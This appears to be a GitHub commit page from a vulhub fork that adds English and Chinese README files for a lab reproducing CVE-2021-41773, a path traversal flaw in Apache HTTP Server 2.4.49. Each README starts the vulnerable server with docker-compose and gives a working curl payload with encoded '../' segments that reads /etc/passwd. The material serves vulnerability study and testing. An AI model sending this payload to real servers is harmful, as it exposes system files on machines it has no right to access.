forked from vulhub/vulhub
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
3 changed files
with
75 additions
and
0 deletions.
There are no files selected for viewing
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| # Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773) | ||
|
|
||
| [中文版本(Chinese version)](README.zh-cn.md) | ||
|
|
||
| The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows. | ||
|
|
||
| A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. | ||
|
|
||
| If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. | ||
|
|
||
| References: | ||
|
|
||
| - https://httpd.apache.org/security/vulnerabilities_24.html | ||
| - https://twitter.com/ptswarm/status/1445376079548624899 | ||
| - https://twitter.com/HackerGautam/status/1445412108863041544 | ||
|
|
||
| ## Vulnerable environment | ||
|
|
||
| Execute following commands to start a vulnerable Apache HTTP Server: | ||
|
|
||
| ``` | ||
| docker-compose build | ||
| docker-compose up -d | ||
| ``` | ||
|
|
||
| After the server is started, you can see the default page which says `It works!` of Apache HTTP Server through `http://your-ip:8080`. | ||
|
|
||
| ## Exploit | ||
|
|
||
| A simple CURL command to reproduce the vulnerability: | ||
|
|
||
| ``` | ||
| curl -v --path-as-is http://your-ip:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd | ||
| ``` | ||
|
|
||
| The `/etc/passwd` is disclosured successfully: | ||
|
|
||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| # Apache HTTPd 2.4.49 路径穿越漏洞(CVE-2021-41773) | ||
|
|
||
| Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: | ||
|
|
||
| - 版本等于2.4.49 | ||
| - 穿越的目录允许被访问,比如配置了`<Directory />Require all granted</Directory>`。(默认情况下是不允许的) | ||
|
|
||
| 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码。 | ||
|
|
||
| 参考链接: | ||
|
|
||
| - https://httpd.apache.org/security/vulnerabilities_24.html | ||
| - https://twitter.com/ptswarm/status/1445376079548624899 | ||
| - https://twitter.com/HackerGautam/status/1445412108863041544 | ||
|
|
||
| ## 漏洞环境 | ||
|
|
||
| 执行如下命令编译及运行一个存在漏洞的Apache HTTPd 2.4.49版本服务器: | ||
|
|
||
| ``` | ||
| docker-compose build | ||
| docker-compose up -d | ||
| ``` | ||
|
|
||
| 环境启动后,访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面。 | ||
|
|
||
| ## 漏洞利用 | ||
|
|
||
| 使用如下CURL命令来发送Payload: | ||
|
|
||
| ``` | ||
| curl -v --path-as-is http://your-ip:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd | ||
| ``` | ||
|
|
||
| 可见,成功读取到`/etc/passwd`: | ||
|
|
||
|  |